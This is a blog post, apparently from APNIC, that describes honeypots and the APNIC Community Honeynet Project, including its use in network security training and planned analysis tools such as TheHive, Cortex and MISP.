How can we defend against an enemy when we don’t even know who the enemy is?
It’s a key question — first asked by Lance Spitzner — that I ask during network security workshops when discussing the need for network security to be proactive as much as it is reactive to mitigate against potential incidents.
Apart from keeping abreast of the latest cybersecurity news and being actively involved in security incident response communities, such as FIRST or your local national Computer Emergency Response Team, another way to learn about how attacks work and what tools adversaries use is to deploy a honeypot.
A honeypot is an information system resource used by security analysts to learn about attacks for the purpose of research and/or detection.It is not a single application or technology, but a collection of standalone computers and servers set up to attract network-based attacks. They do this by emulating known vulnerabilities happening in the wild, such as telnet or ssh services.Once a compromised device or attacker connects to a honeypot, we can collect a set of observables such as source IP addresses, hosts serving malicious codes, or techniques for gaining a foothold on the honeypot. From this, we might be able to learn about the bigger picture of the attack. A honeynet is a network of honeypots.
It’s something we started integrating into our network security workshops a few years back. Initially, the idea was to show how a system is compromised and then pivot to the different types of security controls that could have mitigated the attack in the first place. However, because many workshop participants showed interest in deploying honeypots we started to think how we could enable participants to do it in a more coordinated manner and use this as a platform for continuous learning or mentoring. This was the premise for the APNIC Community Honeynet Project.
Established in 2017, the Project has assisted network engineers and network security personnel throughout the Asia Pacific region with setting up individual honeypots in their networks; the data is shared via a dashboard that Community members have access to. By having a network of honeypots spread across more than 12 economies (and counting), we all have a greater understanding of certain types of attacks happening in the region.
From a training perspective, the Project has provided extra value for our participants. Not only does it provide live data to work with during workshops, but it helps participants to explore security outside of the classroom and expand their professional networks if they choose to set up a honeypot on their network and connect it to the honeynet. That said, the Project is open to anyone in the region who wants to participate — all it takes is a server and IP address.
More functions on the horizon
We are continually expanding the honeynet infrastructure to include features such as ‘case management’ and ‘observable’ analysis engines with TheHive and Cortex. These will help community partners to dig deeper into the data seen by the honeypots.
Cortex, for example, allows you to automate analysis of different types of observable IP addresses, domain names, files, hashes, email headers, URLs with a single click so that you don’t have to look them up manually on different sites. A typical use case would be:
- Given an IP address — what else is known about its past (malicious) activities
- Given a URL where a piece of binary was downloaded to the honeypot — what other binaries have the site served in the past.
Additionally, a lot of this information can be shared with the wider community through platforms such as MISP.
We are also working tools to advise network operators on devices that are potentially infected with malware.
All these tools will be available to the community and APNIC Members and add to the growing number of free and open incident analyzers available that are helping us to better understand who our enemies are.
If you’d like to participate in the APNIC Community Honeynet Project or know more, please contact firstname.lastname@example.org or leave a comment below.
The views expressed by the authors of this blog are their own and do not necessarily reflect the views of APNIC. Please note a Code of Conduct applies to this blog.